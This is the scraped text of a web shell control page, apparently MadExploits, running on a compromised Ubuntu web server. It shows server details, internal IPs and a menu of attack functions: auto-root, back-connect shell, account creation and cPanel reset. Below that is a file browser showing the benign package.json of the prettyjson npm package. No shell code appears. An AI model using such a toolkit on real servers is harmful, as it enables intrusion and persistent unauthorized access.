Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
prettyjson /
[ HOME SHELL ]
Name
Size
Permission
Action
bin
[ DIR ]
drwxrwxr-x
lib
[ DIR ]
drwxrwxr-x
node_modules
[ DIR ]
drwxrwxr-x
History.md
108
B
-rw-rw-r--
LICENSE
1.07
KB
-rw-rw-r--
README.md
3.63
KB
-rw-rw-r--
package.json
1.36
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "author": "Rafael de Oleza <rafeca@gmail.com> (https://github.com/rafeca)", "name": "prettyjson", "description": "Package for formatting JSON data in a coloured YAML-style, perfect for CLI output", "version": "1.2.5", "homepage": "http://rafeca.com/prettyjson", "keywords": [ "json", "cli", "formatting", "colors" ], "repository": { "type": "git", "url": "https://github.com/rafeca/prettyjson.git" }, "bugs": { "url": "https://github.com/rafeca/prettyjson/issues" }, "main": "./lib/prettyjson", "files": [ "bin/prettyjson", "lib/*.js" ], "license": "MIT", "scripts": { "test": "npm run jshint && mocha --reporter spec", "testwin": "node ./node_modules/mocha/bin/mocha --reporter spec", "jshint": "jshint lib/*.js test/*.js", "coverage": "istanbul cover _mocha --report lcovonly -- -R spec", "coveralls": "npm run coverage && cat ./coverage/lcov.info | coveralls && rm -rf ./coverage", "changelog": "git log $(git describe --tags --abbrev=0)..HEAD --pretty='* %s' --first-parent" }, "bin": { "prettyjson": "./bin/prettyjson" }, "dependencies": { "colors": "1.4.0", "minimist": "^1.2.0" }, "devDependencies": { "coveralls": "^2.11.15", "istanbul": "^0.4.5", "jshint": "^2.9.4", "mocha": "^3.1.2", "mocha-lcov-reporter": "^1.2.0", "should": "^11.1.1" } }
Close